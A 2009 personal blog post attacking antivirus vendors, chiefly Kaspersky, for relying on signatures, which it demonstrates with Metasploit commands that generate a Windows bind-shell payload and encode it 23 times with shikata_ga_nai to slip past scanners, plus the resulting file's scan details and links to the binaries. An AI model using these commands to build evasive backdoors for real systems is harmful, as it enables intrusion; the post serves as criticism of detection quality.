Syndicate

Syndicate content

Flattr


Flattr this
If you like this, you can use flattr. ;)

Imprint

About
eMail: wishinet at gmail . com
PGP ID: 0xCCCA5E74

Jabber: wishi@jabber.ccc.de

Home | Blogs | wishi's blog

AV evasion and about rankings

Sat, 08/08/2009 - 17:42 |  wishi
txttxt

Some AV Vendors Lack Efficiency

Once upon a time we were living in a world where creating protective technology, still called Anti-Virus, was a good thing to do. These days vendors seem to be too relaxed with the idea of selling the pig in a poke.
(Source: Roel Schouwenberg's rant ;) - yes I reversed his message)

Obscure security software closes Polypack?

The Kaspersky "researcher" doesn't seem to like the Polypack project, which simply demonstrated that especially Kaspersky's engine fails to detect packed (or encoded) malicious software because it's just signature dependent cheap-ware.
In my comparisons Kaspersky was among the worst engines on the market, which simply led to the decision to buy another one.
As long as we lack competitive results other people won't be able to test AV software according to their needs. Polypack now is restricted - a majority of people will not be able to draw these conclusions.
Surely this is provoked, because scanning a piece of software at VirusTotal reveals similar truth if you go through packing and encoding your binaries. In the following let's go through a short demonstration with msfencode:

  1. wishi@somepc ~#339933;">/pentest#339933;">/exploits#339933;">/framework3
  2. #339933;">% .#339933;">/msfpayload windows#339933;">/shell_bind_tcp LPORT#339933;">=#0000dd;">6666 X #339933;">> evil_malware.#202020;">exe
  3. Created by msfpayload #009900;">(#339933;"><a href#339933;">=#ff0000;">"http://www.metasploit.com" title#339933;">=#ff0000;">"http://www.metasploit.com"#339933;">>http#339933;">:#666666; font-style: italic;">//www.metasploit.com</a>).
  4. Payload#339933;">: windows#339933;">/shell_bind_tcp
  5.  Length#339933;">: #0000dd;">341
  6. Options#339933;">: LPORT#339933;">=#0000dd;">6666
  7. wishi@somepc ~#339933;">/pentest#339933;">/exploits#339933;">/framework3
  8. #339933;">% msfencode x86#339933;">/shikata_ga_nai #339933;">-c #0000dd;">23 #339933;">-i evil_malre.#202020;">exe #339933;">-t exe #339933;">> payload_getme.#202020;">exe
  9. #009900;">[#339933;">*#009900;">] x86#339933;">/shikata_ga_nai succeeded#339933;">, final size #0000dd;">4701

For everybody who is unfamiliar with Metasploit:
msfpayload generates a "netcat binary" that opens a reverse shell on the target system at port 6666 which an attacker can connect to.
msfencode encodes the binary 23 times with shikata ga nai - simply a polymorphic XOR additive feedback encoding against a four byte key.

Now let's upload the payload_getme.exe to VirusTotal and check whether Kaspersky gets it:

A realistic test-case: a one minute malware

The binary:
download of the encoded binary
download of the unencoded binary

The details are

  1. File size#339933;">: #0000dd;">7897 bytes
  2. MD5...#339933;">: ac31e944dadbd19cad6a9c6392f9cbb2
  3. SHA1..#339933;">: 199ca40325f00c241cc4f4a3f250ce2f19928c50
  4. SHA256#339933;">: 0df5ee634299d10f61b0b47ae98a65d6031a7a20f1603f9d6c7f2cdee326dd98
  5. ssdeep#339933;">: #0000dd;">192#339933;">:F#339933;">+EhmnIPq5275rtUtMtk8sD#339933;">/UYxBXayPbW5tlny5#339933;">:ZzP6275roMtc9zFPa57
  6. nM
  7. PEiD..#339933;">: #339933;">-
  8. TrID..#339933;">: File type identification
  9. Win32 Executable Generic #009900;">(58.2#339933;">%#009900;">)
  10. Win16#339933;">/#0000dd;">32 Executable Delphi generic #009900;">(14.1#339933;">%#009900;">)
  11. Generic Win#339933;">/DOS Executable #009900;">(13.6#339933;">%#009900;">)
  12. DOS Executable Generic #009900;">(13.6#339933;">%#009900;">)
  13. VXD Driver #009900;">(0.2#339933;">%#009900;">)
  14. PEInfo#339933;">: PE Structure information
  15.  
  16. #009900;">( base data #009900;">)
  17. entrypointaddress.#339933;">: #208080;">0x1000
  18. timedatestamp.....#339933;">: 0xa06f53f9L #009900;">(invalid#009900;">)
  19. machinetype.......#339933;">: #208080;">0x14c #009900;">(I386#009900;">)
  20.  
  21. #009900;">( #0000dd;">3 sections #009900;">)
  22. name viradd virsiz rawdsiz ntrpy md5
  23. .#202020;">text #208080;">0x1000 #208080;">0x28 #208080;">0x200 0.35 069035f6a494e732c83dd2b3b4fa5a89
  24. .#202020;">data #208080;">0x2000 #208080;">0xa90 #208080;">0xc00 7.94 76e83aec75a56c0a2aeb4ccfb8895cc8
  25. .#202020;">idata #208080;">0x3000 #208080;">0x64 #208080;">0x200 7.61 89ec0a7836ffb1f3502f0b4f0017f5ab
  26.  
  27. #009900;">( #0000dd;">0 imports #009900;">)
  28.  
  29. #009900;">( #0000dd;">0 exports #009900;">)
  30. PDFiD.#339933;">: #339933;">-
  31. RDS...#339933;">: NSRL Reference Data Set
  32. #339933;">-
  33. packers #009900;">(Kaspersky#009900;">)#339933;">: PE_Patch

That's really dangerous

AntiVirus industry not only tries to establish a false sense of security to its users, it also suppresses research. Instead of going after academics who demonstrate the mistakes this industry makes, they should get up, and create something effective against "Malware". Now.
And instead of creating stupid signature-dependant cheap-ware there's stuff to learn from heuristics or behavior analysis.

However one might assume that marketing people do not want competitive analysis. Simply because as long as people fear they buy.
Instead of celebrating multi-million dollar parties and employing clueless people especially Kaspersky should redefine what they are: a security company or a mafia.

Have fun,
wishi

wishi's blog |  1+[encrypted]+#b94+ |  txttxt |  Tags: computer crimes, Malware, Windows security

Post new comment

The content of this field is kept private and will not be shown publicly.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Inhaltlich Verantwortlicher gemäß § 10 Absatz 3 MDStV, § 5 TMG, § 55 RfStV: Marius Ciepluch - Schauenburger Weg 5a - 23556 Lübeck
Aus Datenschutzgründen habe ich weder offiziellen noch behördlichen Schriftverkehr via eMail.

Save the nature. Don't print this!


I provide textual exports for every blog entry. However let's save the nature together. The nature is everything around us. Every being should be respected. Save the nature - don't print too much.


Die Umgehung dieser Ausdrucksperre ist nach § 95a UrhG verboten!
Inhaltlich Verantwortlicher gemäß § 10 Absatz 3 MDStV: Marius Ciepluch - Anschrift via eMail. Die eMail Adresse entnehmen sie dem Impresseum dieser englischsprachigen Seite.
Aus Datenschutzgründen habe ich weder offiziellen noch behördlichen Schriftverkehr via eMail. Dazu ist die postalische, beim Dienstleister hinterlegte, Anschrift zu verwenden.

Datenerfassung

Es werden keine personenbezogenen Daten erfasst. Logdaten werden anonymisiert.